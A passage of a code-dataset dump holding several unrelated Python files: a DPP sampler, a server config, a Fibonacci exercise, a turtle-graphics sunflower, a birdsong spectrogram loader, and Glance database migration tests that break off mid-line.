mode:\n\t\tIndicate how the conditional probabilities i.e. the ratio of 2 determinants must be updated.\n\n\t\tIf ``proj_kernel=True``:\n\t\t\t- \"GS\" (default): Gram-Schmidt on the columns of :math:`K`\n\t\t\t# - \"Schur\": Schur complement updates\n\n\t\tIf ``proj_kernel=False``:\n\t\t\t- \"GS\" (default): Gram-Schmidt on the columns of :math:`K` equiv\n\t\t\t- \"GS_bis\": Slight modif of \"GS\"\n\t\t\t- \"KuTa12\": Algorithm 1 in :cite:`KuTa12`\n\t:type mode:\n\t\tstring, default 'GS_bis'\n\n\t:return:\n\t\tA sample from :math:`\\operatorname{DPP}(K)`.\n\t:rtype:\n\t\tlist\n\n\t.. seealso::\n\n\t\t- :func:`proj_k_dpp_sampler `\n\t\t- :func:`k_dpp_sampler_eig `\n\t\"\"\"\n\n\tif proj_kernel:\n\t\tsampl = proj_k_dpp_sampler_kernel(kernel, size, mode)\n\n\telse:\n\t\teig_vecs, eig_vals = la.eigh(kernel)\n\t\tsampl = k_dpp_sampler_eig(eig_vals, eig_vecs, size, mode)\n\n\treturn sampl\n\n#########################\n### Projection kernel ###\n#########################\ndef proj_k_dpp_sampler_kernel(kernel, size, mode=\"GS\"):\n\t\"\"\"\n\t\t.. seealso::\n\t\t\t- :func:`proj_dpp_sampler_kernel_GS_bis `\n\t\t\t# - :func:`proj_dpp_sampler_kernel_Schur `\n\t\"\"\"\n\n\t#### Phase 1: Select eigenvectors\n\t# No need for eigendecomposition\n\n\t#### Phase 2: Sample from orthogonal projection kernel K = K^2 = K.T K\n\t# Chain rule, conditionals are updated using:\n\tif mode == \"GS\": # Gram-Schmidt equiv Cholesky\n\t\tsampl = proj_dpp_sampler_kernel_GS(kernel, size)\n\n\t# elif mode == \"Shur\": # Schur complement\n\t# \tsampl = proj_dpp_sampler_kernel_Schur(kernel, size)\n\n\telse:\n\t\tstr_list = [\"Invalid 'mode' parameter, choose among:\",\n\t\t\t\t\t\t\t\t\"- 'GS' (default)\",\n\t\t\t\t\t\t\t\t# \"- 'Schur'\",\n\t\t\t\t\t\t\t\t\"Given 'mode' = {}\".format(mode)]\n\t\traise ValueError(\"\\n\".join(str_list))\n\n\treturn sampl\n\n#######################################################\n# From the eigen decomposition of the kernel :math:`K`\n\n######################\n### Generic kernel ###\n######################\n\ndef k_dpp_sampler_eig(eig_vals, eig_vecs, size, mode=\"GS\",\n\t\t\t\t\t\t\t\t\t\t\tel_sym_pol_eval=None):\n\t\"\"\"\n\t\t.. seealso::\n\n\t\t\tPhase 1:\n\n\t\t\t- :func:`k_dpp_eig_vecs_selector `\n\n\t\t\tPhase 2:\n\n\t\t\t- :func:`proj_dpp_sampler_eig_GS_bis `\n\t\t\t- :func:`proj_dpp_sampler_eig_GS `\n\t\t\t- :func:`proj_dpp_sampler_eig_KuTa12 `\n\t\"\"\"\n\t#### Phase 1: Select eigenvectors\n\teig_vecs_sel = k_dpp_eig_vecs_selector(eig_vals, eig_vecs, size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tel_sym_pol_eval)\n\n\t#### Phase 2: Sample from projection kernel VV.T\n\t# Chain rule, conditionals are updated using:\n\n\tif mode == \"GS\": # Gram-Schmidt\n\t\tsampl = proj_dpp_sampler_eig_GS(eig_vecs_sel)\n\n\telif mode == \"GS_bis\": # Slight modif of \"GS\"\n\t\tsampl = proj_dpp_sampler_eig_GS_bis(eig_vecs_sel)\n\n\telif mode == \"KuTa12\": # cf Kulesza-Taskar\n\t\tsampl = proj_dpp_sampler_eig_KuTa12(eig_vecs_sel)\n\n\telse:\n\t\tstr_list = [\"Invalid 'mode' parameter, choose among:\",\n\t\t\t\t\t\t\t\t\"- 'GS' (default)\",\n\t\t\t\t\t\t\t\t\"- 'GS_bis'\",\n\t\t\t\t\t\t\t\t\"- 'KuTa12'\",\n\t\t\t\t\t\t\t\t\"Given 'mode' = {}\".format(mode)]\n\t\traise ValueError(\"\\n\".join(str_list))\n\n\treturn sampl\n\ndef k_dpp_eig_vecs_selector(eig_vals, eig_vecs, size, el_sym_pol_eval=None):\n\t\"\"\" Subsample eigenvectors V of the initial kernel ('K' or equivalently 'L') to build a projection DPP with kernel V V.T from which sampling is easy. The selection is made based a realization of Bernoulli variables with parameters the eigenvalues of 'K'.\n\n\t:param eig_vals:\n\t\tCollection of eigen values of 'K' (inclusion) kernel.\n\t:type eig_vals:\n\t\tlist, array_type\n\n\t:param eig_vecs:\n\t\tCollection of eigenvectors of 'K' (or equiv 'L') kernel.\n\t:type eig_vals:\n\t\tarray_type\n\n\t:return:\n\t\tSelected eigenvectors\n\t:rtype:\n\t\tarray_type\n\n\t.. seealso::\n\n\t\tAlgorithm 8 in :cite:`KuTa12`\n\t\"\"\"\n\n\t# Size of the ground set\n\tnb_items = eig_vecs.shape[0]\n\n\t# Evaluate the elem symm polys in the eigenvalues\n\tif el_sym_pol_eval is None:\n\t\tE = elem_symm_poly(eig_vals, size)\n\telse:\n\t\tE = el_sym_pol_eval\n\n\tind_selected = []\n\tfor n in range(nb_items,0,-1):\n\t\tif size == 0:\n\t\t\tbreak\n\n\t\tif np.random.rand() < eig_vals[n-1]*(E[size-1, n-1]/E[size, n]):\n\t\t\tind_selected.append(n-1)\n\t\t\tsize -= 1\n\n\treturn eig_vecs[:, ind_selected]\n\n# Evaluate the elementary symmetric polynomials\ndef elem_symm_poly(eig_vals, size):\n\t\"\"\" Evaluate the elementary symmetric polynomials in the eigenvalues.\n\n\t:param eig_vals:\n\t\tCollection of eigen values of the similarity kernel :math:`K`.\n\t:type eig_vals:\n\t\tlist\n\n\t:param size:\n\t\tMaximum degree of elementary symmetric polynomial.\n\t:type size:\n\t\tint\n\n\t:return:\n\t\tpoly(size, N) = :math:`e_size(\\lambda_1, \\cdots, \\lambda_N)`\n\t:rtype:\n\t\tarray_type\n\n\t.. seealso::\n\n\t\tAlgorithm 7 in :cite:`KuTa12`\n\t\"\"\"\n\n\t# Number of variables for the elementary symmetric polynomials to be evaluated\n\tN = eig_vals.shape[0]\n\t# Initialize output array\n\tpoly = np.zeros((size+1, N+1))\n\tpoly[0, :] = 1\n\n\t# Recursive evaluation\n\tfor l in range(1, size+1):\n\t\tfor n in range(1, N+1):\n\t\t\tpoly[l, n] = poly[l, n-1] + eig_vals[n-1] * poly[l-1, n-1]\n\n\treturn poly","sub_path":"dppy/exact_sampling.py","file_name":"exact_sampling.py","file_ext":"py","file_size_in_byte":22754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"74252840","text":"from types import SimpleNamespace\nimport os\n\nAPI_SERVER_OPTIONS = ['flask', 'falcon']\nAPI_SERVER = SimpleNamespace(\n type=os.getenv('SERVER_TYPE', API_SERVER_OPTIONS[1]).lower(),\n port=8000,\n host='0.0.0.0',\n debug=False,\n endpoint=os.getenv('ENDPOINT', 'predict'),\n model_path=os.getenv(\n 'SAVED_MODEL_PATH',\n 'srv/models/efficientdet_d3_coco17_tpu-32/saved_model'\n )\n)\nassert API_SERVER.type in API_SERVER_OPTIONS\n","sub_path":"api/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"105430659","text":"# Задача 5\n#\n# Последовательность Фиббоначи определена реккурентным соотношением\n# Fn = Fn-1 + Fn-2,\n# где F1 = 1 и F2 = 1\n#\n# Первые 12 членов последовательности будут такими:\n# F1=1,\n# F2=1,\n# F3=2,\n# F4=3,\n# F5=5,\n# F6=8,\n# F7=13,\n# F8=21,\n# F9=34,\n# F10=55,\n# F11=89,\n# F12=144\n\n# Можно увидеть, что 12-ый член последовательности - первый, состоящий из трех цифр.\n#\n# Найдите номер первого члена последовательности Фиббоначи, такого, что число цифр в нём равно 1139.\n\ndef fib(n):\n a = 0\n b = 1\n for __ in range(n):\n a, b = b, a + b\n return a\n\nn = 0\nwhile True:\n if len(str(fib(n))) == 1139:\n print(n)\n break\n n += 1\n","sub_path":"problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"405839228","text":"''' \n Author: Kent D. Lee\n Date: 9/26/2014\n Copyright (c) 2014\n Free for educational use. Others may use with permission.\n\n Source: \n\n I used http://fractalfoundation.org/OFC/OFC-11-3.html as a source for this \n information. \n \n Description:\n \n This program draws sunflower seeds in the pattern of a funflower. The ration of \n consecutive fibonacci numbers in the sequence approach the golden ratio as the \n sequence grows. In the limit, the ratio of two consecutive fibonacci numbers is\n the golden ratio. \n \n In the sunflower fibonacci numbers can be observed by counting the number of seeds\n in the spiral arms. Count the number of seeds in a left spiral arm and a right spiral\n arm. You'll see that they are two fibonacci numbers. \n \n You may have to make the radius size of the seeds constant to count the seeds. It won't\n look as pretty, but will be easier to count. You may also need to increase the forward \n to separate the seeds. \n'''\n\nimport turtle\nimport math\n\n\nclass Circle:\n def __init__(self,radius, width=1,color=\"white\",outline=\"black\"):\n self.radius = radius\n self.width = width\n self.color = color\n self.outline = outline\n \n def draw(self,turtle):\n centerX = turtle.xcor()\n centerY = turtle.ycor()\n turtle.penup()\n turtle.goto(centerX+self.radius,centerY)\n turtle.pendown()\n turtle.width(self.width)\n turtle.pencolor(self.outline)\n turtle.fillcolor(self.color)\n turtle.begin_fill()\n for i in range(361):\n newX = self.radius * math.cos((i/180.0) * math.pi) + centerX\n newY = self.radius * math.sin((i/180.0) * math.pi) + centerY\n turtle.goto(newX,newY)\n \n turtle.end_fill()\n turtle.penup()\n turtle.goto(centerX, centerY)\n turtle.pendown()\n \ndef main():\n \n t = turtle.Turtle()\n t.ht()\n screen = t.getscreen()\n screen.tracer(0)\n \n for x in range(400):\n c = Circle(x/16+4,width=2,color=\"yellow\")\n c.draw(t)\n # This angle is chosen because it is approx.\n # 360/1.61803399. The 1.61803399 is the approx.\n # value of the golden angle\n t.left(222.5)\n t.penup()\n t.forward(x*2 + 8)\n screen.update()\n \n \n \n screen.exitonclick()\n \nif __name__ == \"__main__\":\n main()","sub_path":"build/html/_downloads/6dacc553883d61ea20cd3a8ea33ee034/sunflower.py","file_name":"sunflower.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"75104465","text":"\"\"\"Dataset for birdsongs.\"\"\"\n\n__author__ = \"Jack Goffinet\"\n__date__ = \"April 2019\"\n\n\nfrom os import listdir, sep\nfrom os.path import join\nimport random\n\nimport h5py\n\nimport numpy as np\nfrom scipy.signal import stft\nfrom scipy.interpolate import interp1d\nfrom skimage.transform import resize\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\n\n\nEPSILON = 1e-9\n\n\ndef get_partition(dirs, split):\n\t\"\"\"\n\n\t\"\"\"\n\tassert split > 0.0 and split <= 1.0, \"Invalid split: \"+str(split)\n\tfilenames = []\n\tfor dir in dirs:\n\t\tfilenames += [join(dir, i) for i in listdir(dir) if i[-5:] == '.hdf5']\n\tnp.random.seed(42)\n\tnp.random.shuffle(filenames)\n\tnp.random.seed(None)\n\tindex = int(round(split * len(filenames)))\n\treturn {'train': filenames[:index], 'test': filenames[index:]}\n\n\ndef get_spec(audio, start_frame, stop_frame, p, fs):\n\t\"\"\"Get a spectrogram.\"\"\"\n\tf, t, spec = stft(audio[start_frame:stop_frame], fs=fs)\n\tspec = np.log(np.abs(spec) + EPSILON)\n\tspec -= p['spec_thresh']\n\tspec[spec < 0.0] = 0.0\n\t# Switch to mel frequency spacing.\n\tif p['mel']:\n\t\tnew_f = np.linspace(mel(p['min_freq']), mel(p['max_freq']), p['num_freq_bins'], endpoint=True)\n\t\tnew_f = inv_mel(new_f)\n\t\tnew_f[0] = f[0] # Correct for numerical errors.\n\t\tnew_f[-1] = f[-1]\n\telse:\n\t\tnew_f = np.linspace(p['min_freq'], p['max_freq'], p['num_freq_bins'], endpoint=True)\n\tnew_spec = np.zeros((p['num_freq_bins'], spec.shape[1]), dtype='float')\n\tfor j in range(spec.shape[1]):\n\t\tinterp = interp1d(f, spec[:,j], kind='cubic')\n\t\tnew_spec[:,j] = interp(new_f)\n\tnew_spec = resize(new_spec, (p['num_freq_bins'], p['num_time_bins']), anti_aliasing=True, mode='reflect')\n\tspec = new_spec\n\t# Normalize.\n\tspec *= 0.9 / (np.max(spec) + EPSILON)\n\tspec += 0.05\n\treturn spec, t[1] - t[0]\n\n\ndef get_data_loaders(partition, params, batch_size=64, num_time_bins=128, \\\n\t\t\tshuffle=(True, False)):\n\tsongs_per_file = params['songs_per_file']\n\ttrain_dataset = SongDataset(filenames=partition['train'], \\\n\t\t\tparams=params,\n\t\t\ttransform=ToTensor(),\n\t\t\tsongs_per_file=songs_per_file)\n\ttrain_dataloader = DataLoader(train_dataset, batch_size=batch_size, \\\n\t\t\tshuffle=shuffle[0], num_workers=3)\n\tif not partition['test']:\n\t\treturn train_dataloader, None\n\ttest_dataset = SongDataset(filenames=partition['test'], \\\n\t\t\tparams=params,\n\t\t\ttransform=ToTensor(),\n\t\t\tsongs_per_file=songs_per_file)\n\ttest_dataloader = DataLoader(test_dataset, batch_size=batch_size, \\\n\t\t\tshuffle=shuffle[1], num_workers=3)\n\treturn train_dataloader, test_dataloader\n\n\n\nclass SongDataset(Dataset):\n\t\"\"\"Dataset for birdsongs\"\"\"\n\n\tdef __init__(self, filenames, params, songs_per_file=1000, transform=None):\n\t\tself.filenames = filenames\n\t\tself.p = params\n\t\tself.songs_per_file = songs_per_file\n\t\tself.transform = transform\n\n\n\tdef __len__(self):\n\t\treturn len(self.filenames) * self.songs_per_file\n\n\n\tdef __getitem__(self, index, start_frame=None, start_time=None):\n\t\tresult = []\n\t\tsingle_index = False\n\t\ttry:\n\t\t\titerator = iter(index)\n\t\t\tif start_frame is None:\n\t\t\t\tstart_frame = [None] * len(index)\n\t\t\tif start_time is None:\n\t\t\t\tstart_time = [None] * len(index)\n\t\texcept TypeError:\n\t\t\tindex = [index]\n\t\t\tstart_frame = [start_frame]\n\t\t\tstart_time = [start_time]\n\t\t\tsingle_index = True\n\t\tfor j, i in enumerate(index):\n\t\t\t# First find the file.\n\t\t\tload_filename = self.filenames[i // self.songs_per_file]\n\t\t\tfile_index = i % self.songs_per_file\n\t\t\t# Then collect fields from the file.\n\t\t\twith h5py.File(load_filename, 'r') as f:\n\t\t\t\tsample = {\n\t\t\t\t\t'audio': f['audio'][file_index],\n\t\t\t\t\t'time': f['time'][file_index],\n\t\t\t\t\t'file_time': f['file_time'][file_index],\n\t\t\t\t\t'filename': str(f['filename'][file_index]),\n\t\t\t\t\t'fs' : f['fs'][file_index]\n\t\t\t\t}\n\t\t\t\taudio_frames = int(sample['fs'] * self.p['spec_dur'])\n\t\t\t\tif start_frame[j] is None and start_time[j] is None:\n\t\t\t\t\tstart_frame[j] = random.randint(0, len(sample['audio']) - audio_frames)\n\t\t\t\telif start_time[j] is not None:\n\t\t\t\t\tstart_frame[j] = int(round(sample['fs'] * start_time[j]))\n\t\t\t\tspec, _ = get_spec(sample['audio'], start_frame[j], start_frame[j]+audio_frames, self.p, sample['fs'])\n\t\t\t\tsample['spec'] = spec\n\t\t\t\tdel sample['audio']\n\t\t\tif self.transform:\n\t\t\t\tsample = self.transform(sample)\n\t\t\tresult.append(sample)\n\t\tif single_index:\n\t\t\treturn result[0]\n\t\treturn result\n\n\n\nclass ToTensor(object):\n\n\tdef __call__(self, sample):\n\t\tspec = sample['spec']\n\t\tspec = torch.from_numpy(spec).type(torch.FloatTensor)\n\t\tsample['spec'] = spec\n\t\treturn sample\n\n\n\ndef mel(a):\n\treturn 1127 * np.log(1 + a / 700)\n\n\ndef inv_mel(a):\n\treturn 700 * (np.exp(a / 1127) - 1)\n\n\n\nif __name__ == '__main__':\n\tpass\n\n\n###\n","sub_path":"models/fixed_window_dataset.py","file_name":"fixed_window_dataset.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"92995621","text":"# Copyright 2010-2011 OpenStack Foundation\n# All Rights Reserved.\n# Copyright 2013 IBM Corp.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nTests for database migrations. This test case reads the configuration\nfile /tests/unit/test_migrations.conf for database connection settings\nto use in the tests. For each connection found in the config file,\nthe test case runs a series of test cases to ensure that migrations work\nproperly both upgrading and downgrading, and that no data loss occurs\nif possible.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport datetime\nimport os\nimport pickle\nimport uuid\n\nfrom migrate.versioning import api as migration_api\nfrom migrate.versioning.repository import Repository\nfrom oslo_config import cfg\nfrom oslo_db.sqlalchemy import test_base\nfrom oslo_db.sqlalchemy import test_migrations\nfrom oslo_db.sqlalchemy import utils as db_utils\nfrom oslo_serialization import jsonutils\nfrom oslo_utils import timeutils\n# NOTE(jokke): simplified transition to py3, behaves like py2 xrange\nfrom six.moves import range\nimport sqlalchemy\nfrom sqlalchemy import inspect\n\nfrom glance.common import crypt\nfrom glance.common import exception\nfrom glance.common import utils\nfrom glance.db import migration\nfrom glance.db.sqlalchemy import migrate_repo\nfrom glance.db.sqlalchemy.migrate_repo.schema import from_migration_import\nfrom glance.db.sqlalchemy import models\nfrom glance.db.sqlalchemy import models_artifacts\nfrom glance.db.sqlalchemy import models_metadef\n\nfrom glance import i18n\n\n_ = i18n._\n\nCONF = cfg.CONF\nCONF.import_opt('metadata_encryption_key', 'glance.common.config')\n\n\ndef index_exist(index, table, engine):\n inspector = sqlalchemy.inspect(engine)\n return index in [i['name'] for i in inspector.get_indexes(table)]\n\n\ndef unique_constraint_exist(constraint, table, engine):\n inspector = sqlalchemy.inspect(engine)\n return constraint in [c['name'] for c in\n inspector.get_unique_constraints(table)]\n\n\nclass MigrationsMixin(test_migrations.WalkVersionsMixin):\n @property\n def INIT_VERSION(self):\n return migration.INIT_VERSION\n\n @property\n def REPOSITORY(self):\n migrate_file = migrate_repo.__file__\n return Repository(os.path.abspath(os.path.dirname(migrate_file)))\n\n @property\n def migration_api(self):\n return migration_api\n\n @property\n def migrate_engine(self):\n return self.engine\n\n def test_walk_versions(self):\n # No more downgrades\n self._walk_versions(False, False)\n\n def _create_unversioned_001_db(self, engine):\n # Create the initial version of the images table\n meta = sqlalchemy.schema.MetaData()\n meta.bind = engine\n images_001 = sqlalchemy.Table('images', meta,\n sqlalchemy.Column('id', models.Integer,\n primary_key=True),\n sqlalchemy.Column('name',\n sqlalchemy.String(255)\n ),\n sqlalchemy.Column('type',\n sqlalchemy.String(30)),\n sqlalchemy.Column('size',\n sqlalchemy.Integer),\n sqlalchemy.Column('status',\n sqlalchemy.String(30)),\n sqlalchemy.Column('is_public',\n sqlalchemy.Boolean,\n default=False),\n sqlalchemy.Column('location',\n sqlalchemy.Text),\n sqlalchemy.Column('created_at',\n sqlalchemy.DateTime(),\n nullable=False),\n sqlalchemy.Column('updated_at',\n sqlalchemy.DateTime()),\n sqlalchemy.Column('deleted_at',\n sqlalchemy.DateTime()),\n sqlalchemy.Column('deleted',\n sqlalchemy.Boolean(),\n nullable=False,\n default=False),\n mysql_engine='InnoDB',\n mysql_charset='utf8')\n images_001.create()\n\n def test_version_control_existing_db(self):\n \"\"\"\n Creates a DB without version control information, places it\n under version control and checks that it can be upgraded\n without errors.\n \"\"\"\n self._create_unversioned_001_db(self.migrate_engine)\n\n old_version = migration.INIT_VERSION\n # we must start from version 1\n migration.INIT_VERSION = 1\n self.addCleanup(setattr, migration, 'INIT_VERSION', old_version)\n\n self._walk_versions(False, False)\n\n def _pre_upgrade_003(self, engine):\n now = datetime.datetime.now()\n images = db_utils.get_table(engine, 'images')\n data = {'deleted': False, 'created_at': now, 'updated_at': now,\n 'type': 'kernel', 'status': 'active', 'is_public': True}\n images.insert().values(data).execute()\n return data\n\n def _check_003(self, engine, data):\n images = db_utils.get_table(engine, 'images')\n self.assertNotIn('type', images.c,\n \"'type' column found in images table columns! \"\n \"images table columns reported by metadata: %s\\n\"\n % images.c.keys())\n images_prop = db_utils.get_table(engine, 'image_properties')\n result = images_prop.select().execute()\n types = []\n for row in result:\n if row['key'] == 'type':\n types.append(row['value'])\n self.assertIn(data['type'], types)\n\n def _pre_upgrade_004(self, engine):\n \"\"\"Insert checksum data sample to check if migration goes fine with\n data.\n \"\"\"\n now = timeutils.utcnow()\n images = db_utils.get_table(engine, 'images')\n data = [\n {\n 'deleted': False, 'created_at': now, 'updated_at': now,\n 'type': 'kernel', 'status': 'active', 'is_public': True,\n }\n ]\n engine.execute(images.insert(), data)\n return data\n\n def _check_004(self, engine, data):\n \"\"\"Assure that checksum data is present on table\"\"\"\n images = db_utils.get_table(engine, 'images')\n self.assertIn('checksum', images.c)\n self.assertEqual(32, images.c['checksum'].type.length)\n\n def _pre_upgrade_005(self, engine):\n now = timeutils.utcnow()\n images = db_utils.get_table(engine, 'images')\n data = [\n {\n 'deleted': False, 'created_at': now, 'updated_at': now,\n 'type': 'kernel', 'status': 'active', 'is_public': True,\n # Integer type signed size limit\n 'size': 2147483647\n }\n ]\n engine.execute(images.insert(), data)\n return data\n\n def _check_005(self, engine, data):\n\n images = db_utils.get_table(engine, 'images')\n select = images.select().execute()\n\n sizes = [row['size'] for row in select if row['size'] is not None]\n migrated_data_sizes = [element['size'] for element in data]\n\n for migrated in migrated_data_sizes:\n self.assertIn(migrated, sizes)\n\n def _pre_upgrade_006(self, engine):\n now = timeutils.utcnow()\n images = db_utils.get_table(engine, 'images')\n image_data = [\n {\n 'deleted': False, 'created_at': now, 'updated_at': now,\n 'type': 'kernel', 'status': 'active', 'is_public': True,\n 'id': 9999,\n }\n ]\n engine.execute(images.insert(), image_data)\n\n images_properties = db_utils.get_table(engine, 'image_properties')\n properties_data = [\n {\n 'id': 10, 'image_id': 9999, 'updated_at': now,\n 'created_at': now, 'deleted': False, 'key': 'image_name'\n }\n ]\n engine.execute(images_properties.insert(), properties_data)\n return properties_data\n\n def _check_006(self, engine, data):\n images_properties = db_utils.get_table(engine, 'image_properties')\n select = images_properties.select().execute()\n\n # load names from name collumn\n image_names = [row['name'] for row in select]\n\n # check names from data in image names from name collumn\n for element in data:\n self.assertIn(element['key'], image_names)\n\n def _pre_upgrade_010(self, engine):\n \"\"\"Test rows in images with NULL updated_at get updated to equal\n created_at.\n \"\"\"\n\n initial_values = [\n (datetime.datetime(1999, 1, 2, 4, 10, 20),\n datetime.datetime(1999, 1, 2, 4, 10, 30)),\n (datetime.datetime(1999, 2, 4, 6, 15, 25),\n datetime.datetime(1999, 2, 4, 6, 15, 35)),\n (datetime.datetime(1999, 3, 6, 8, 20, 30),\n None),\n (datetime.datetime(1999, 4, 8, 10, 25, 35),\n None),\n ]\n\n images = db_utils.get_table(engine, 'images')\n for created_at, updated_at in initial_values:\n row = dict(deleted=False,\n created_at=created_at,\n updated_at=updated_at,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0)\n images.insert().values(row).execute()\n\n return initial_values\n\n def _check_010(self, engine, data):\n values = {c: u for c, u in data}\n\n images = db_utils.get_table(engine, 'images')\n for row in images.select().execute():\n if row['created_at'] in values:\n # updated_at should be unchanged if not previous NULL, or\n # set to created_at if previously NULL\n updated_at = values.pop(row['created_at']) or row['created_at']\n self.assertEqual(row['updated_at'], updated_at)\n\n # No initial values should be remaining\n self.assertEqual(0, len(values))\n\n def _pre_upgrade_012(self, engine):\n \"\"\"Test rows in images have id changes from int to varchar(32) and\n value changed from int to UUID. Also test image_members and\n image_properties gets updated to point to new UUID keys.\n \"\"\"\n\n images = db_utils.get_table(engine, 'images')\n image_members = db_utils.get_table(engine, 'image_members')\n image_properties = db_utils.get_table(engine, 'image_properties')\n\n # Insert kernel, ramdisk and normal images\n now = timeutils.utcnow()\n data = {'created_at': now, 'updated_at': now,\n 'status': 'active', 'deleted': False,\n 'is_public': True, 'min_disk': 0, 'min_ram': 0}\n\n test_data = {}\n for name in ('kernel', 'ramdisk', 'normal'):\n data['name'] = '%s migration 012 test' % name\n result = images.insert().values(data).execute()\n test_data[name] = result.inserted_primary_key[0]\n\n # Insert image_members and image_properties rows\n data = {'created_at': now, 'updated_at': now, 'deleted': False,\n 'image_id': test_data['normal'], 'member': 'foobar',\n 'can_share': False}\n result = image_members.insert().values(data).execute()\n test_data['member'] = result.inserted_primary_key[0]\n\n data = {'created_at': now, 'updated_at': now, 'deleted': False,\n 'image_id': test_data['normal'], 'name': 'ramdisk_id',\n 'value': test_data['ramdisk']}\n result = image_properties.insert().values(data).execute()\n test_data['properties'] = [result.inserted_primary_key[0]]\n\n data.update({'name': 'kernel_id', 'value': test_data['kernel']})\n result = image_properties.insert().values(data).execute()\n test_data['properties'].append(result.inserted_primary_key)\n\n return test_data\n\n def _check_012(self, engine, test_data):\n images = db_utils.get_table(engine, 'images')\n image_members = db_utils.get_table(engine, 'image_members')\n image_properties = db_utils.get_table(engine, 'image_properties')\n\n # Find kernel, ramdisk and normal images. Make sure id has been\n # changed to a uuid\n uuids = {}\n for name in ('kernel', 'ramdisk', 'normal'):\n image_name = '%s migration 012 test' % name\n rows = images.select().where(\n images.c.name == image_name).execute().fetchall()\n\n self.assertEqual(1, len(rows))\n\n row = rows[0]\n self.assertTrue(utils.is_uuid_like(row['id']))\n\n uuids[name] = row['id']\n\n # Find all image_members to ensure image_id has been updated\n results = image_members.select().where(\n image_members.c.image_id == uuids['normal']).execute().fetchall()\n self.assertEqual(1, len(results))\n\n # Find all image_properties to ensure image_id has been updated\n # as well as ensure kernel_id and ramdisk_id values have been\n # updated too\n results = image_properties.select().where(\n image_properties.c.image_id == uuids['normal']\n ).execute().fetchall()\n self.assertEqual(2, len(results))\n for row in results:\n self.assertIn(row['name'], ('kernel_id', 'ramdisk_id'))\n\n if row['name'] == 'kernel_id':\n self.assertEqual(row['value'], uuids['kernel'])\n if row['name'] == 'ramdisk_id':\n self.assertEqual(row['value'], uuids['ramdisk'])\n\n def _post_downgrade_012(self, engine):\n images = db_utils.get_table(engine, 'images')\n image_members = db_utils.get_table(engine, 'image_members')\n image_properties = db_utils.get_table(engine, 'image_properties')\n\n # Find kernel, ramdisk and normal images. Make sure id has been\n # changed back to an integer\n ids = {}\n for name in ('kernel', 'ramdisk', 'normal'):\n image_name = '%s migration 012 test' % name\n rows = images.select().where(\n images.c.name == image_name).execute().fetchall()\n self.assertEqual(1, len(rows))\n\n row = rows[0]\n self.assertFalse(utils.is_uuid_like(row['id']))\n\n ids[name] = row['id']\n\n # Find all image_members to ensure image_id has been updated\n results = image_members.select().where(\n image_members.c.image_id == ids['normal']).execute().fetchall()\n self.assertEqual(1, len(results))\n\n # Find all image_properties to ensure image_id has been updated\n # as well as ensure kernel_id and ramdisk_id values have been\n # updated too\n results = image_properties.select().where(\n image_properties.c.image_id == ids['normal']).execute().fetchall()\n self.assertEqual(2, len(results))\n for row in results:\n self.assertIn(row['name'], ('kernel_id', 'ramdisk_id'))\n\n if row['name'] == 'kernel_id':\n self.assertEqual(row['value'], str(ids['kernel']))\n if row['name'] == 'ramdisk_id':\n self.assertEqual(row['value'], str(ids['ramdisk']))\n\n def _assert_invalid_swift_uri_raises_bad_store_uri(self,\n legacy_parse_uri_fn):\n invalid_uri = ('swift://http://acct:usr:pass@example.com'\n '/container/obj-id')\n # URI cannot contain more than one occurrence of a scheme.\n self.assertRaises(exception.BadStoreUri,\n legacy_parse_uri_fn,\n invalid_uri,\n True)\n\n invalid_scheme_uri = ('http://acct:usr:pass@example.com'\n '/container/obj-id')\n self.assertRaises(AssertionError,\n legacy_parse_uri_fn,\n invalid_scheme_uri,\n True)\n\n invalid_account_missing_uri = 'swift+http://container/obj-id'\n # Badly formed S3 URI: swift+http://container/obj-id\n self.assertRaises(exception.BadStoreUri,\n legacy_parse_uri_fn,\n invalid_account_missing_uri,\n True)\n\n invalid_container_missing_uri = ('swift+http://'\n 'acct:usr:pass@example.com/obj-id')\n # Badly formed S3 URI: swift+http://acct:usr:pass@example.com/obj-id\n self.assertRaises(exception.BadStoreUri,\n legacy_parse_uri_fn,\n invalid_container_missing_uri,\n True)\n\n invalid_object_missing_uri = ('swift+http://'\n 'acct:usr:pass@example.com/container')\n # Badly formed S3 URI: swift+http://acct:usr:pass@example.com/container\n self.assertRaises(exception.BadStoreUri,\n legacy_parse_uri_fn,\n invalid_object_missing_uri,\n True)\n\n invalid_user_without_pass_uri = ('swift://acctusr@example.com'\n '/container/obj-id')\n # Badly formed credentials '%(creds)s' in Swift URI\n self.assertRaises(exception.BadStoreUri,\n legacy_parse_uri_fn,\n invalid_user_without_pass_uri,\n True)\n\n # Badly formed credentials in Swift URI.\n self.assertRaises(exception.BadStoreUri,\n legacy_parse_uri_fn,\n invalid_user_without_pass_uri,\n False)\n\n def test_legacy_parse_swift_uri_015(self):\n (legacy_parse_uri,) = from_migration_import(\n '015_quote_swift_credentials', ['legacy_parse_uri'])\n\n uri = legacy_parse_uri(\n 'swift://acct:usr:pass@example.com/container/obj-id',\n True)\n self.assertTrue(uri, 'swift://acct%3Ausr:pass@example.com'\n '/container/obj-id')\n\n self._assert_invalid_swift_uri_raises_bad_store_uri(legacy_parse_uri)\n\n def _pre_upgrade_015(self, engine):\n images = 